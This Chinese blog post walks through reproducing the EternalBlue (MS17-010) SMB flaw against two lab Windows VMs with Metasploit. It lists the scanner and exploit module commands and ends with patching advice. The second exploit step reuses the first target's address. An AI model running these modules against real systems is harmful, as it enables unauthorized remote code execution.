admin 管理员组

文章数量: 887007

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

  • 🍬 博主介绍
  • 一、永恒之蓝简介
  • 二、影响范围
  • 三、环境搭建
  • 四、漏洞复现
    • 1、Windows Server 2008 R2 Datacenter 7601 Service Pack 1
      • 1.搜索ms17-010相关模块
      • 2.使用检测模块
      • 3.获取权限
    • 2、Windows 7 Home Basic 7600 x64 (64-bit)
      • 1.搜索ms17-010相关模块
      • 2.使用检测模块
      • 3.获取权限
  • 五、漏洞修复

这里简单演示一下,下一篇文章详细写利用该漏洞留存后门相关知识

一、永恒之蓝简介

永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

二、影响范围

Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server2008 R2
Windows 8.1
Windows Server 2012
Windows10
Windows Server 2012 R2
Windows Server 2016

三、环境搭建

上面版本中随便找一个搭建就行
然后关闭防火墙,开启3389端口
我这里搭建了两个版本

Windows Server 2008 R2 Datacenter 7601 Service Pack 1
Windows 7 Home Basic 7600 x64 (64-bit)

四、漏洞复现

进入msf控制台

msfconsole

1、Windows Server 2008 R2 Datacenter 7601 Service Pack 1

1.搜索ms17-010相关模块

search ms17-010

2.使用检测模块

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.13.182
run

3.获取权限

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.13.182
Run

2、Windows 7 Home Basic 7600 x64 (64-bit)

1.搜索ms17-010相关模块

search ms17-010

2.使用检测模块

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.13.183
run

3.获取权限

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.13.182
run

五、漏洞修复

受影响的系统版本可以参照:

https://docs.microsoft/zh-cn/security-updates/securitybulletins/2017/ms17-010

关闭445端口。
打开防火墙,安装安全软件。
安装对应补丁。

本文标签: 靶机 蓝屏 漏洞 实例 权限